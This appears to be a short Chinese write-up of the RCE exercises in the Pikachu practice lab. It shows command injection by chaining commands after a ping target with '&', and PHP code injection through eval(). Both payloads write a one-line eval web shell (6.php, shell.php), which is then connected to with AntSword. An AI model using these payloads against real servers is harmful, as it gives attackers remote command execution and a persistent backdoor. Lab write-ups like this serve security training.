Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
我是Superman丶1 小时前
Docker 命令自用
运维·docker·容器
weixin_lizhao1 小时前
50天独立打造企业级API网关(二):安全防护体系与弹性设计
java·spring boot·安全·spring cloud·gateway
网络笨猪1 小时前
Nginx企业级高频场景配置大全
运维·nginx
牛奶1 小时前
1秒下单10万次,服务器是怎么扛住的?
大数据·服务器·后端
楼田莉子2 小时前
仿Muduo的高并发服务器:LoopThread模块及其ThreadPool模块
linux·服务器·c++·后端·学习
techdashen2 小时前
等了两年,Cloudflare 终于给规则引擎加上了通配符
服务器·rust
記億揺晃着的那天2 小时前
Claude Code 系统提示词里的安全底线:OWASP Top 10
安全·ai·ai编程·vibe coding·claude code
zhangfeng11332 小时前
宝塔服务器完全可以安装 Git,进行版本管理,而且非常简单
运维·服务器·人工智能·git·编程
重明链迹实验室3 小时前
重明链迹丨每周区块链安全要闻(0427-0503)
安全·web3·区块链
科研前沿3 小时前
SpaceOS™空间计算底座与五大自研引擎,实现多项关键技术突破
大数据·运维·人工智能·算法·重构